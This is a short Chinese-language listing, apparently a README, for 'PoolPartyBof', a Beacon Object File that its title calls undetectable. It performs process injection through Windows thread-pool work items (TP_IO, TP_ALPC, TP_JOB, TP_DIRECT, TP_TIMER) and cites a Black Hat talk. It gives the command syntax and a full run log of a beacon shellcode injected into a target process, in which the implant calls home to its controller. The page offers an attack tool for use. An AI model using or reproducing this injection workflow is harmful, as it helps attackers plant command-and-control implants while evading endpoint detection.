无法被检测的进程注入BOF插件

https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446

将TP_IO工作项插入目标进程的线程池。将TP_ALPC工作项插入目标进程的线程池。将TP_JOB工作项插入目标进程的线程池。将TP_DIRECT工作项插入目标进程的线程池。将TP_TIMER工作项插入目标进程的线程池

PoolPartyBof <Process ID> <Path To Shellcode> <Variant>

PoolPartyBof 2136 /tmp/beacon_x64.bin 4[*] Opening 2136 and running PoolParty with /tmp/beacon_x64.bin shellcode![+] host called home, sent: 314020 bytes[+] received output:[INFO]   Shellcode Size: 307200 bytes[+] received output:[INFO]   Starting PoolParty attack against process id: 2136[+] received output:[INFO]   Retrieved handle to the target process: 0000000000000670[+] received output:[INFO]   Hijacked worker factory handle from the target process: 000000C96E0FF5B8[+] received output:[INFO]   Hijacked timer queue handle from the target process: 000000C96E0FF5B8[+] received output:[INFO]   Allocated shellcode memory in the target process: 00000290C91B0000[+] received output:[INFO]   Written shellcode to the target process[+] received output:[INFO]   Retrieved target worker factory basic information[+] received output:[INFO]   Created TP_TIMER structure associated with the shellcode[+] received output:[INFO]   Allocated TP_TIMER memory in the target process: 00000290C9200000 [+] received output:[INFO]   Written the specially crafted TP_TIMER structure to the target process[+] received output:[INFO]   Modified the target process's TP_POOL timer queue WindowsStart and Windows End to point to the specially crafted TP_TIMER[+] received output:[INFO]   Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration[+] received output:[INFO]   PoolParty attack completed.